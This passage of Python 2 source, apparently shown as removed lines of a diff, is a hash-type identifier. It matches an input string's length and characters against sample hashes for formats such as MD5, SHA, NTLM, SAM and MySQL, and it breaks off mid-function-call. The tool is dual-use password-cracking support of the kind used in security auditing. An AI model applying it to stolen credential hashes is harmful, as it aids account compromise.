"106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); 